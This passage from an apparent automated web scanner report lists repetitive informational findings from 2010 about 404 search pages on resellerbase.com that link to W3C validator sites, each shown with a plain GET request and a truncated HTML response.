<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.144. http://www.resellerbase.com/detail/19/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/19/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/19/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.145. http://www.resellerbase.com/detail/20/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/20/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/20/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.146. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.147. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.148. http://www.resellerbase.com/detail/20/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/20/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/20/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.149. http://www.resellerbase.com/detail/20/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/20/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/20/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.150. http://www.resellerbase.com/detail/22/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/22/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/22/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.151. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.152. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.153. http://www.resellerbase.com/detail/22/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/22/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/22/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.154. http://www.resellerbase.com/detail/22/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/22/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/22/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.155. http://www.resellerbase.com/detail/23/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/23/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/23/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.156. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.157. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.158. http://www.resellerbase.com/detail/23/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/23/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/23/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.159. http://www.resellerbase.com/detail/23/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/23/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/23/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.160. http://www.resellerbase.com/detail/25/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/25/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/25/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/25/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/25/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.161. http://www.resellerbase.com/detail/26/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/26/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/26/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
